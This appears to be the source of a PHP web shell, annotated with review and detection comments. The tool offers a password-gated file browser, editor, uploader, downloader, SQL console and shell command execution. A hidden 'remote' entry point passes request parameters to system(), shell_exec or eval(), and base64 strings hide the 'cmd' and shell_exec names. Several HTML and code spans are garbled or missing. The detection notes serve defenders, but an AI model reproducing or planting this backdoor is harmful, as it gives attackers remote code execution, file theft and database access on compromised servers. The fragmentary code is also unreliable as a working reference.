action = isset($_GET["act"])? $_GET["act"]:null;
$this->setCookies();
}
// Cookie-based password gate. The posted password is md5-hashed and loosely compared (==)
// with the PASSWORD constant, so PASSWORD is expected to hold an md5 hex digest rather than
// the plaintext. On success the digest itself is written to the "shell_pass" cookie for one
// day and the browser is redirected; isAuthenticated() later treats that cookie as the session.
// Detection note: the cookie names "shell_pass", "shell_path" and "shell_sql" (the latter two
// are cleared by logout() below) are stable markers of this tool in request logs.
// NOTE(review): the HTML login form that followed the `?>` and the opening of logout()
// (`public function logout() { if($this->`) were lost in extraction; from "action == ..."
// onward this span is the tail of logout(), which expires all three cookies and redirects
// when $this->action is "exit". Passing null as the cookie value is deprecated since PHP 8.1.
public function login() {
if(!$this->isAuthenticated()) {
if(@md5($_POST["password"]) == PASSWORD) {
setcookie("shell_pass", PASSWORD, time() + (60 * 60 * 24), "/");
header("Location: " . this_url());
} else {
?>
action == "exit") {
setcookie("shell_pass", null, time() - (60 * 60), "/");
setcookie("shell_path", null, time() - (60 * 60), "/");
setcookie("shell_sql", null, time() - (60 * 60), "/");
header("Location: " . this_url());
}
}
// True when the "shell_pass" cookie equals the PASSWORD constant (the md5 digest that login()
// stored), false when the cookie is absent or differs. The check is the loose != operator
// rather than hash_equals(), and the cookie carries the digest itself, not a random session id,
// so the cookie value is a direct indicator of this tool's authenticated state.
private function isAuthenticated() {
if(!isset($_COOKIE["shell_pass"]))
return false;
if($_COOKIE["shell_pass"] != PASSWORD)
return false;
return true;
}
// Refreshes the two state cookies on every request (called from the constructor).
// "shell_path": the directory the file browser works in. It is reset to root_dir() when the
// cookie is absent or no longer names a directory; otherwise, if ?path= names an existing
// directory, the cookie is moved there. Because of the elseif, ?path= is ignored on the same
// request that resets the cookie.
// "shell_sql": a serialize()d 5-element list [host, user, pass, db, dbms] holding database
// credentials - including the password - in a client-side cookie. A fresh cookie starts with
// the literal placeholder strings "host", "user", ...; afterwards each slot is replaced by the
// non-empty POST field of the same name ("db" also by ?db=). The existing cookie is read back
// with unserialize(), i.e. client-controlled data is deserialized on every request.
private function setCookies() {
if(!isset($_COOKIE["shell_path"]) || !is_dir($_COOKIE['shell_path']))
setcookie("shell_path", root_dir(), time() + (60 * 60 * 24), "/");
elseif(isset($_GET['path']) && is_dir($_GET['path']))
setcookie("shell_path", $_GET['path'], time() + (60 * 60 * 24), "/");
if(!isset($_COOKIE["shell_sql"])) {
$cookie = array("host", "user", "pass", "db", "dbms");
} else {
$values = unserialize($_COOKIE["shell_sql"]);
$cookie = array();
// @ silences the notice for an absent key; an empty string counts as "not supplied".
$cookie[] = (isset($_POST['host']) && @$_POST['host'] != "")? $_POST['host']:$values[0];
$cookie[] = (isset($_POST['user']) && @$_POST['user'] != "")? $_POST['user']:$values[1];
$cookie[] = (isset($_POST['pass']) && @$_POST['pass'] != "")? $_POST['pass']:$values[2];
$cookie[] = ((isset($_POST['db']) && @$_POST['db'] != "")? $_POST['db']:(isset($_GET['db']) ? $_GET['db']:$values[3]));
$cookie[] = (isset($_POST['dbms']) && @$_POST['dbms'] != "")? $_POST['dbms']:$values[4];
}
setcookie("shell_sql", serialize($cookie), time() + (60 * 60 * 24), "/");
}
// Streams the file named by POST "path" to the client as an attachment when the request
// carries the authentication cookie. The path is handed to FileTransfer::downloader() unchanged,
// which reads it with no base-directory restriction.
public function download() {
if(isset($_POST["download"]) && $this->isAuthenticated())
FileTransfer::downloader($_POST['path']);
}
// info() prints a one-line host summary (Computer / Domain / User / IP). NOTE(review): the PHP
// echoes that filled those fields, the end of info() and the header of actions() were lost in
// extraction; from "action == ..." onward this span is the body of actions(), which dispatches
// on $this->action (set from ?act= in the constructor):
//   "fbrowser"      - directory listing (FileBrowser),
//   "feditor"       - read/write/remove/rename/mkdir on a path (FileEditor),
//   "fuploader"     - file upload form (FileTransfer::uploader),
//   baseos("Y21k")  - command execution (Cmd); "Y21k" is base64 for "cmd",
//   baseos("c3Fs")  - ad-hoc SQL console (Database); "c3Fs" is base64 for "sql",
//   "exit"          - logout().
// baseos() is a helper defined outside this span, presumably base64_decode - TODO confirm.
// Detection note: because the cmd/sql action names are base64-obscured, a plain-string grep of
// the file misses them; ?act=fbrowser|feditor|fuploader and the shell_* cookies are reliable.
public function info() {
?>
Computer: |
Domain: |
User: |
IP: |
action == "fbrowser") {
$fbrowser = new FileBrowser(this_path());
$fbrowser->body();
} elseif($this->action == "feditor") {
$feditor = new FileEditor((this_file() ? this_file():this_path()));
$feditor->actions();
$feditor->body();
} elseif($this->action == "fuploader") {
FileTransfer::uploader(this_path());
} elseif($this->action == baseos("Y21k")) {
Cmd::body();
} elseif($this->action == baseos("c3Fs")) {
$sql = new Database();
$sql->query();
$sql->body();
} elseif($this->action == "exit") {
$this->logout();
}
}
// Second entry point that bypasses the cookie login (it is invoked before login() at the bottom
// of the file): any request with a "remote" parameter - GET, POST or cookie, via $_REQUEST -
// whose "password" md5-hashes to PASSWORD is handled here. Exactly one of three parameters is
// acted on, then exit() ends the response:
//   baseos("Y21k") ("cmd") - the value is passed to Cmd::run() as a shell command,
//   "php"                  - the value is passed to eval(),
//   "info"                 - prints OS, current user, hostname and SERVER_ADDR.
// The nested request() helper prefers the urldecoded GET value and otherwise base64-decodes the
// POST value ($_POST[$req] is read without isset, so a missing key raises a warning).
// PHP registers a function declared inside a method at global scope when the method first runs,
// so a second call of remote() in the same process fails with a "cannot redeclare" error.
// Detection note: requests carrying "remote" and "password" together with cmd/php/info, or a
// POST body whose values are base64 text, are the signature of this path.
public function remote() {
function request($req) {
return isset($_GET[$req]) ? urldecode($_GET[$req]):base64_decode($_POST[$req]);
}
if(isset($_REQUEST["remote"]) && @md5($_REQUEST["password"]) == PASSWORD) {
if(isset($_REQUEST[baseos("Y21k")]))
Cmd::run(request(baseos("Y21k")));
elseif(isset($_REQUEST["php"]))
eval(request("php"));
elseif(isset($_REQUEST["info"]))
echo os().":".@get_current_user()."/".@gethostname().":".@getenv('SERVER_ADDR');
exit();
}
}
}
// Directory listing for the UI. $path is expected to end with a directory separator: every
// entry is formed as $this->path . $name without inserting one. $path is a dynamic
// (undeclared) property, which PHP 8.2+ deprecates.
class FileBrowser {
public function __construct($path) {
$this->path = $path;
}
// Renders the browser page. NOTE(review): the HTML after `?>` and the PHP tags that followed
// were lost in extraction; what survives is the column header row (Name | Size | Permissions |
// Created | Modified), the call to dirsFiles(), and from the sprintf templates onward the body
// of dirsFiles() itself (its signature and the start of $fstr were lost). dirsFiles() builds
// one row per directory, then one per file, from listDirsFiles(), or a "Can't access" row when
// the listing fails. The `$dfl == false` test is a loose comparison; it only works because a
// successful listing is always a two-element array, which is never == false.
public function body() {
?>
">
Cwd: cwd(); ?> |
Drives: drives(); ?> |
|
|
">
Name | Size | Permissions | Created | Modified |
dirsFiles(); ?>
%s | %s | %s / %s | %s | %s | ";
$dstr = "%s | %s | %s / %s | %s | %s |
";
$dfl = $this->listDirsFiles();
if($dfl == false)
return "Can't access: $this->path |
";
$df_list = "";
foreach($dfl[0] as $d)
$df_list .= sprintf($fstr, urlencode($d[1].DIRECTORY_SEPARATOR), $d[0].DIRECTORY_SEPARATOR, $d[2], $d[3], $d[4], $d[5], $d[6]);
foreach($dfl[1] as $f)
$df_list .= sprintf($dstr, urlencode($f[1]), $f[0], $f[2], $f[3], $f[4], $f[5], $f[6]);
return $df_list;
}
// Scans $this->path and returns array($dirs, $files), or false when scandir() fails (its
// warning is suppressed with @). Each entry is a 7-element list:
//   [name, full path, "Dir" | human-readable size, "uid:gid", octal perms, ctime, mtime]
// "." and ".." are skipped, as is anything for which neither is_dir() nor is_file() holds.
public function listDirsFiles() {
$dirs = array();
$files = array();
if(($d_f = @scandir($this->path)) === false)
return false;
foreach($d_f as $i) {
if($i != '.' && $i != '..') {
$path = $this->path . $i;
if(is_dir($this->path . $i))
$dirs[] = array(
$i, $path, "Dir",
$this->getUidGid($path), $this->getPerms($path),
$this->getCMDate($path), $this->getCMDate($path, 9)
);
if(is_file($this->path . $i))
$files[] = array(
$i, $path, $this->getSize($path),
$this->getUidGid($path), $this->getPerms($path),
$this->getCMDate($path), $this->getCMDate($path, 9)
);
}
}
return array($dirs, $files);
}
// Prints the current path as a chain of per-segment links. NOTE(review): the loop header and
// the anchor markup between `$i` and `$parts[$i]` were garbled in extraction; only the explode()
// on DIRECTORY_SEPARATOR and the per-segment echo are recoverable from here.
private function cwd() {
$path = "";
$parts = explode(DIRECTORY_SEPARATOR, $this->path);
for($i=0; $i" . $parts[$i] . DIRECTORY_SEPARATOR . "";
}
}
// Windows helper: probes drive letters A: to Z: and prints those that are readable or are a
// directory (both branches print the same text; @ hides warnings for absent drives). On a
// POSIX host none of these paths normally exist, so nothing is printed.
private function drives() {
foreach(range("A", "Z") as $drive) {
if(@is_readable($drive . ":" . DIRECTORY_SEPARATOR))
echo "$drive:\\ ";
elseif(@is_dir($drive . ":" . DIRECTORY_SEPARATOR))
echo "$drive:\\ ";
}
}
// Human-readable size from stat()[7] (size in bytes): whole MB above 1 MiB, whole KB above
// 1 KiB, else bytes. Fractions are truncated by the (int) cast, not rounded.
private function getSize($path) {
$stat = stat($path);
if($stat[7] > (1024*1024))
return (int)($stat[7] / (1024*1024)) . " MB";
elseif($stat[7] > 1024)
return (int)($stat[7] / 1024) . " KB";
return $stat[7] . " B";
}
// Last four octal digits of fileperms(), e.g. "0644" for rw-r--r--.
private function getPerms($path) {
return substr(sprintf("%o", fileperms($path)), -4);
}
// "uid:gid" of the owner, from stat() indices 4 (uid) and 5 (gid).
private function getUidGid($path) {
$stat = stat($path);
return $stat[4] . ":" . $stat[5];
}
// Formats one stat() timestamp as d/m/Y H:i. Index 10 (the default) is ctime - shown as
// "Created" in the listing, although on POSIX it is the inode change time, not creation time;
// index 9 is mtime ("Modified").
private function getCMDate($path, $d=10) {
$stat = stat($path);
return date("d/m/Y H:i", $stat[$d]);
}
}
// Read/write/delete/rename/mkdir on a single path. The path comes from POST "path" when
// present and otherwise from the constructor argument. path, text and message are dynamic
// (undeclared) properties, deprecated in PHP 8.2+.
class FileEditor {
public function __construct($path) {
$this->path = isset($_POST['path'])? $_POST['path']:$path;
$this->text = "";
$this->message = "";
}
// Dispatches on which submit button was posted; at most one action runs per request.
// "write" takes the new content from POST "content" (read without isset, so a missing key
// warns). "rename" passes this_file() - or this_path() when this_file() is null - as the new
// name; both helpers are defined outside this class, presumably request-derived - TODO confirm.
public function actions() {
if(isset($_POST["read"]))
$this->feRead();
elseif(isset($_POST["write"]))
$this->feWrite($_POST['content']);
elseif(isset($_POST["remove"]))
$this->message = $this->feRemove($this->path) ? "Deleted.":"Failed.";
elseif(isset($_POST["rename"]))
$this->feRename(((this_file() == null) ? this_path():this_file()));
elseif(isset($_POST["mkdir"]))
$this->feMkdir();
}
// Renders the editor page. NOTE(review): the HTML after `?>`, the end of body() and the
// signature of feRead() were lost in extraction; "path)) !== false)" appears to be the tail of
// `if(($data = @file_get_contents($this->path)) !== false)`. On success the content goes to
// $this->text, HTML-escaped only when isHtml() reports it as HTML; otherwise it is stored raw.
public function body() {
?>
path)) !== false)
$this->text = $this->isHtml($data) ? htmlspecialchars($data):$data;
else
$this->message = "Can't access file.";
}
// Overwrites $this->path with $data; @ suppresses the warning on failure.
private function feWrite($data) {
$this->message = (@file_put_contents($this->path, $data) !== false) ? "Saved.":"Failed.";
}
// Deletes a file, or a directory tree recursively. Returns the result of the final unlink() /
// rmdir(), or false when the path is neither a file nor a directory or cannot be listed. The
// results of the recursive calls are ignored, so a partially deleted tree only surfaces as the
// top-level rmdir() failing.
private function feRemove($path) {
if(!is_file($path) && !is_dir($path))
return false;
if(is_file($path))
return @unlink($path);
if(($dir_content = @scandir($path)) === false)
return false;
foreach($dir_content as $d_f)
if($d_f != "." && $d_f != "..")
$this->feRemove($path . DIRECTORY_SEPARATOR . $d_f);
return @rmdir($path);
}
// Renames $this->path to $new_path.
private function feRename($new_path) {
$this->message = (@rename($this->path, $new_path) !== false) ? "Renamed.":"Failed.";
}
// Creates the directory $this->path (non-recursive, default mode).
private function feMkdir() {
$this->message = (@mkdir($this->path) !== false) ? "Created.":"Failed.";
}
// Heuristic deciding whether feRead() escapes the content. NOTE(review): both patterns were
// reduced to '//im' in extraction (their bodies, presumably HTML tag matches, were stripped);
// as printed they match every string. The third preg_match() argument $m is unused.
private function isHtml($data) {
if(preg_match('//im', $data, $m) || preg_match('//im', $data, $m))
return true;
return false;
}
}
class FileTransfer {
// Upload form and handler. NOTE(review): the form and the handling code that preceded
// `File uploaded.` were lost in extraction; only the two result messages survive, so the
// condition choosing between them cannot be stated from here.
public static function uploader($path) {
?>
File uploaded.";
else
echo "Failed.";
}
}
// Sends $file to the client as an attachment and terminates the script. The full path is given
// to readfile() unchanged; only the Content-Disposition filename is basename()d. Two header
// quirks: Content-Length is wrapped in double quotes, which is not a valid numeric value, and
// Content-Type ends with a stray ";". The @ operators hide the warnings for an unreadable file,
// in which case the headers are sent with an empty body.
public static function downloader($file) {
header("Content-Disposition: attachment; filename=\"" . @basename($file) . "\"");
header("Content-Length: \"" . @filesize($file) . "\"");
header("Content-Type: application/octet-stream;");
@readfile($file);
exit();
}
}
// Ad-hoc SQL console over PDO. Connection parameters come from POST fields first, then from
// the "shell_sql" cookie (a serialize()d [host, user, pass, db, dbms] list read back with
// unserialize() - client-controlled deserialization); "db" is also taken from ?db=. host, user,
// pass, db, dbms, query and output are dynamic (undeclared) properties.
class Database {
// Default listing statements; my_* are MySQL, ms_* are SQL Server.
private $my_dbs = "SHOW DATABASES;";
private $my_tbl = "SHOW TABLES;";
private $ms_dbs = "SELECT name FROM master.dbo.sysdatabases";
private $ms_tbl = "SELECT * FROM INFORMATION_SCHEMA.TABLES;";
// Chooses the statement to run:
//   ?db=      -> "SHOW TABLES;" against that database,
//   ?table=   -> "SELECT * FROM $get_table;" - the table name is interpolated verbatim from
//                the query string, neither quoted nor whitelisted,
//   otherwise -> the MySQL database list;
// when the form was submitted ("submit"), the free-text POST "query" is used verbatim instead,
// falling back to the dbms-appropriate database list when it is empty.
public function __construct() {
$cookies = isset($_COOKIE["shell_sql"]) ? unserialize($_COOKIE["shell_sql"]):array("host", "user", "pass", "db", "dbms");
$get_db = isset($_GET['db']) ? urldecode($_GET['db']):null;
$get_table = isset($_GET['table']) ? urldecode($_GET['table']):null;
$this->host = isset($_POST['host']) ? $_POST['host']:$cookies[0];
$this->user = isset($_POST['user']) ? $_POST['user']:$cookies[1];
$this->pass = isset($_POST['pass']) ? $_POST['pass']: $cookies[2];
$this->db = (isset($get_db) ? $get_db : (isset($_POST['db']) ? $_POST['db']:$cookies[3]));
$this->dbms = isset($_POST['dbms']) ? $_POST['dbms']:$cookies[4];
$this->query = (isset($get_db) ? "SHOW TABLES;":(isset($get_table) ? "SELECT * FROM $get_table;":$this->my_dbs));
if(isset($_POST["submit"]))
$this->query = ((@$_POST['query'] != "") ? $_POST['query']:($this->dbms == "mssql" ? $this->ms_dbs:$this->my_dbs));
$this->output = "";
}
// Renders the console page. NOTE(review): the HTML after `?>` and the PHP tags around the
// connection code were lost in extraction. The surviving code connects with a
// "$dbms:host=$host; dbname=$db" DSN (note the space after ";" - TODO confirm every PDO driver
// in use tolerates it), switches PDO to exception mode, prepares and executes $this->query,
// and renders rows via read() when the statement starts with SELECT or SHOW, otherwise
// reports "Query executed.". Connection and execution failures are captured into
// $this->output with the driver message. The @ on `new PDO` and the other statements hides
// warnings only; exceptions still reach the catch blocks.
public function body() {
?>
output; ?>
dbms:host=$this->host; dbname=$this->db";
try {
@$conn = new PDO("$this->dbms:host=$this->host; dbname=$this->db", $this->user, $this->pass);
@$conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
@$query = $conn->prepare($this->query);
try {
@$query->execute();
if(strtoupper(substr($this->query, 0, 6)) == "SELECT" || strtoupper(substr($this->query, 0, 4)) == "SHOW")
$this->read($query);
else
$this->output = "Query executed.";
} catch(PDOException $e) {
$this->output = "Query failed." . $e->getMessage();
}
} catch(PDOException $e) {
$this->output = "Connection failed: " . $e->getMessage();
}
$conn = null;
}
}
// Builds an HTML table from all rows of the executed statement into $this->output.
// NOTE(review): the table/row/cell tags were stripped in extraction; only the values and the
// " | " separators remain. The first row's keys form the header. Values in a column named
// DATABASE or starting with TABLE are emitted unescaped (presumably they were wrapped in
// ?db= / ?table= links); every other value goes through htmlspecialchars(). $result (the
// return of setFetchMode) is unused.
private function read($query) {
$this->output = "";
$result = @$query->setFetchMode(PDO::FETCH_ASSOC);
foreach($query->fetchAll() as $id => $row) {
if($id == 0) {
$this->output .= "";
foreach($row as $n => $v)
$this->output .= "$n | ";
$this->output .= "
";
}
$this->output .= "";
foreach($row as $n => $v) {
if(strtoupper($n) == "DATABASE")
$this->output .= "" . $v . " | ";
elseif(strtoupper(substr($n, 0, 5)) == "TABLE")
$this->output .= "" . $v . " | ";
else
$this->output .= "" . htmlspecialchars($v) . " | ";
}
$this->output .= "
";
}
$this->output .= "
";
}
}
// Shell command execution with a fallback chain over the usual PHP process functions.
// Hardening note: disabling only one of these functions does not stop the chain; system,
// passthru, shell_exec, exec, popen and proc_open would all need to be covered.
class Cmd {
// Command form and runner. NOTE(review): the form and the start of the handler were lost in
// extraction; `&1";` appears to be the tail of a line appending " 2>&1" to the submitted
// command so stderr is captured as well - TODO confirm. The output is printed inline; the
// tags around it were stripped.
public static function body() {
?>
&1";
echo "";
Cmd::run($cmd);
echo "
";
}
}
// Runs $cmd and streams its output straight into the response: system() if callable, else
// passthru(), else the captured string from output().
public static function run($cmd) {
if(is_callable("system"))
system($cmd);
elseif(is_callable("passthru"))
passthru($cmd);
else
echo Cmd::output($cmd);
}
// Captures $cmd's stdout into a string, trying shell_exec() first - its name is base64-obscured
// as "c2hlbGxfZXhlYw==" so the literal never appears in the file - then exec(), popen() and
// proc_open(); returns "Failed." when none is callable. In the proc_open() branch only pipe 1
// is read and closed; pipes 0 and 2 are left open and $proc is not checked for false.
public static function output($cmd) {
$output = "";
if(is_callable(baseos("c2hlbGxfZXhlYw=="))) {
$output = shell_exec($cmd);
} elseif(is_callable("exec")) {
exec($cmd, $out);
foreach($out as $o)
$output .= $o . PHP_EOL;
} elseif(is_callable("popen")) {
if(($pop = popen($cmd, 'r')) !== false) {
while(!feof($pop))
$output .= fread($pop, 1024);
pclose($pop);
}
} elseif(is_callable("proc_open")) {
$desc = array(0=>array("pipe", "r"), 1=>array("pipe", "w"), 2=>array("pipe", "w"));
$proc = proc_open($cmd, $desc, $pipes);
while(!feof($pipes[1]))
$output .= fread($pipes[1], 1024) ;
fclose($pipes[1]);
proc_close($proc);
} else {
$output = "Failed.";
}
return $output;
}
}
class Css {
    // Two palettes, selected by the STYLE constant: "dark" picks the first, anything else the
    // light one. Keys: color (text), back (background), link, visited, hover.
    public static function colors() {
        $dark = array(
            "color" => "#ddefff",
            "back" => "#181818",
            "link" => "#ddefff",
            "visited" => "#83c5ff",
            "hover" => "#202020",
        );
        $light = array(
            "color" => "#181818",
            "back" => "#f0f8ff",
            "link" => "#015fb2",
            "visited" => "#00437e",
            "hover" => "#ddefff",
        );
        return (STYLE == "dark") ? $dark : $light;
    }

    // Inline CSS declarations for one element kind. Block elements (body, table, tr, th, td)
    // get text/background colours, "input" an inverted scheme with a border, "hover" the hover
    // background. Any other $part - including the default "color" - yields the palette array
    // itself rather than a string.
    public static function style($part="color") {
        $palette = self::colors();
        switch ($part) {
            case "body":
            case "table":
            case "tr":
            case "th":
            case "td":
                return sprintf(" color:%s; background-color:%s; ", $palette['color'], $palette['back']);
            case "input":
                $inputArgs = (STYLE == "dark")
                    ? array($palette['back'], $palette['color'], $palette['visited'])
                    : array($palette['hover'], "#242424", $palette['link']);
                return sprintf(" color:%s; background-color:%s; border:1px solid %s; ", $inputArgs[0], $inputArgs[1], $inputArgs[2]);
            case "hover":
                return sprintf(" color:%s; background-color:%s; ", $palette['color'], $palette['hover']);
            default:
                return $palette;
        }
    }
}
?>
remote(); ?>
login(); ?>
logout(); ?>
download(); ?>
Shell
info(); ?>
actions(); ?>